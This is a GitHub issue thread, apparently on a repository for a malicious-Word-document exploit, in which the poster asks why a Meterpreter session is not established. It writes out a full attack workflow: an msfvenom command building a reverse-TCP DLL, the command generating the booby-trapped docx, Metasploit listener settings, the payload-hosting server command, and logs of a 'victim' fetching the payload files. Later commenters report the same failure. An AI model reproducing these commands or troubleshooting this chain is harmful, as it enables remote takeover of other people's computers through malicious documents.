Metasploit not sending stage #14

Open
oflavioc opened this issue Oct 12, 2021 · 3 comments

@oflavioc

I created my own .dll using msfvenom: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=myip LPORT=4444 -f dll -o print.dll

Generated the malicious docx given the dll above: sudo python3 exploit.py generate print.dll http://mypi

Shared the docx with my victim PC and set metasploit as listener:

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost myip
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on myip:4444

Set up the server to transmit other files: sudo python3 exploit.py host 80

File opens ok and I can see the connection attempt to my server, and I'm getting the following messages on port 80:

xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:26] "GET /word.cab HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:28] "HEAD /word.html HTTP/1.1" 200 -

But Metasploit stays in the listening state, with no changes.

If I execute on the victim's PowerShell the command: rundll32 print.dll, start
Metasploit sets the stage successfully and I can control the victim's PC, which indicates the dll is not the issue.

Any tips on how to troubleshoot?

@happyfoxice

I'm observing the same thing where it works and doesn't work. Testing on Win10, I can see the inf is dropped in AppsData\Local\Temp and other times it's not. I see consistent creation of *.dat and *.tmp files. Sometimes after closing the docx, rundll32 remains and msword.inf is locked until I kill rundll32.

@DungLeMTA

DungLeMTA commented Apr 23, 2022

Could we solve it?
I also get the same problem.

@ST0new

ST0new commented Jul 9, 2022

I'm running into the same problem. Is there a solution?

4 participants